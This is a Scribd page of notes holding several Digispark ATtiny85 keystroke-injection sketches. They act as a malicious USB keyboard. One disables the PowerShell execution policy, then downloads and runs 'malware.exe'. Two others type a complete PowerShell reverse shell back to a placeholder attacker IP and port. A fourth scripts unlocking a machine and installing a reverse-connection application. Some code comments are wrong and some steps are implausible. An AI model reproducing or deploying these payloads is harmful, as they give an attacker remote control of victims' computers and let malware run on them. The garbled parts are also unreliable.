Scribd
Upload
20 views3 pages

Notes 20230424202058

This document contains code for an ATtiny85 microcontroller that uses the DigiKeyboard library to simulate keyboard input on a target computer. It will flash an LED, open the command prompt, disable execution policy, download malware from a URL, and execute the malware by simulating keystrokes like CTRL+R, typing commands, and pressing enter. It also contains similar code to inject a reverse shell payload into Powershell and establish a connection back to the attacker.

Uploaded by

Bharath
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
20 views3 pages

Notes 20230424202058

This document contains code for an ATtiny85 microcontroller that uses the DigiKeyboard library to simulate keyboard input on a target computer. It will flash an LED, open the command prompt, disable execution policy, download malware from a URL, and execute the malware by simulating keystrokes like CTRL+R, typing commands, and pressing enter. It also contains similar code to inject a reverse shell payload into Powershell and establish a connection back to the attacker.

Uploaded by

Bharath
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 3

04.

24 8:17 PM
Digispark ATtiny85 microcontroller code
#include <DigiKeyboard.h>

void setup() {
// initialize digital pin 1 as an output.
pinMode(1, OUTPUT);
// wait for the computer to recognize the keyboard
delay(2000);
}

void loop() {
// flash LED to indicate start of keystrokes
digitalWrite(1, HIGH);
delay(500);
digitalWrite(1, LOW);
delay(500);

// type out keystrokes


DigiKeyboard.sendKeyStroke(0);
delay(1000);
DigiKeyboard.sendKeyStroke(KEY_LEFT_GUI);
DigiKeyboard.sendKeyStroke('r');
delay(1000);
DigiKeyboard.println("cmd");
delay(1000);
DigiKeyboard.sendKeyStroke(KEY_RETURN);
delay(1000);
DigiKeyboard.println("powershell -Command \"Set-ExecutionPolicy Bypass -Scope
CurrentUser -Force\" ");
delay(1000);
DigiKeyboard.sendKeyStroke(KEY_RETURN);
delay(1000);
DigiKeyboard.println("powershell -Command \"wget http://example.com/malware.exe -
OutFile C:\\Users\\User\\malware.exe\"");
delay(1000);
DigiKeyboard.sendKeyStroke(KEY_RETURN);
delay(1000);
DigiKeyboard.println("powershell -Command \"Start-Process C:\\Users\\User\\
malware.exe\"");
delay(1000);
DigiKeyboard.sendKeyStroke(KEY_RETURN);
delay(1000);

// flash LED to indicate end of keystrokes


digitalWrite(1, HIGH);
delay(500);
digitalWrite(1, LOW);
delay(500);

// delay for a few minutes before repeating keystrokes


delay(180000);
}

#include "DigiKeyboard.h"

void setup() {
// empty
}
void loop() {
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(500);
DigiKeyboard.print("powershell -nop -w hidden -c $client = New-Object
System.Net.Sockets.TCPClient('YOUR_IP_ADDRESS',YOUR_PORT);$stream =
$client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes,
0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName
System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 |
Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte =
([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();");
DigiKeyboard.sendKeyStroke(KEY_RETURN);
DigiKeyboard.delay(500);
}

#include "DigiKeyboard.h"

void setup() {
pinMode(3, INPUT_PULLUP);
DigiKeyboard.delay(5000); // Wait for the target computer to recognize the
keyboard
}

void loop() {
if (digitalRead(3) == LOW) {
DigiKeyboard.sendKeyStroke(0); // Press the Windows key
DigiKeyboard.sendKeyStroke(KEY_R); // Press the R key
DigiKeyboard.delay(1000);
DigiKeyboard.print("powershell"); // Type out "powershell"
DigiKeyboard.sendKeyStroke(KEY_ENTER); // Press the Enter key
DigiKeyboard.delay(1000);
DigiKeyboard.print("$client = New-Object
System.Net.Sockets.TCPClient('ATTACKER_IP_ADDRESS',ATTACKER_PORT_NUMBER);$stream =
$client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes,
0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName
System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 |
Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte =
([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();"); //
Inject the reverse shell payload
DigiKeyboard.sendKeyStroke(KEY_ENTER); // Press the Enter key
DigiKeyboard.delay(1000);
}
}

#include "DigiKeyboard.h"

void setup() {
DigiKeyboard.delay(5000); // Wait for 5 seconds before starting
DigiKeyboard.sendKeyStroke(0); // Wake up device if it's sleeping
DigiKeyboard.delay(500); // Wait for device to wake up
DigiKeyboard.sendKeyStroke(KEY_LEFT_GUI); // Press and hold the Windows key
DigiKeyboard.sendKeyPress('l'); // Press the letter 'l'
DigiKeyboard.sendKeyStroke(KEY_RETURN); // Release the Windows key and press
Enter
DigiKeyboard.delay(500); // Wait for the lock screen to appear
DigiKeyboard.print("Your unlock code"); // Type in the unlock code
DigiKeyboard.sendKeyStroke(KEY_RETURN); // Press Enter to unlock the device
DigiKeyboard.delay(1000); // Wait for device to unlock
DigiKeyboard.print("google.com/chrome"); // Type in the URL for Google Chrome
DigiKeyboard.sendKeyStroke(KEY_RETURN); // Press Enter to open the browser
DigiKeyboard.delay(5000); // Wait for the browser to open
DigiKeyboard.print("Your download link"); // Type in the URL for the download
link
DigiKeyboard.sendKeyStroke(KEY_RETURN); // Press Enter to start the download
DigiKeyboard.delay(10000); // Wait for download to complete
DigiKeyboard.sendKeyStroke(KEY_LEFT_ALT, KEY_Y); // Press the 'Install anyway'
button
DigiKeyboard.delay(5000); // Wait for installation to complete
DigiKeyboard.print("Your application name"); // Type in the name of the
application
DigiKeyboard.sendKeyStroke(KEY_RETURN); // Press Enter to open the application
DigiKeyboard.delay(5000); // Wait for application to open
DigiKeyboard.print("Your permission code"); // Type in the permission code for
reverse connection
DigiKeyboard.sendKeyStroke(KEY_RETURN); // Press Enter to give permission for
reverse connection
}

void loop() {
// Do nothing
}

You might also like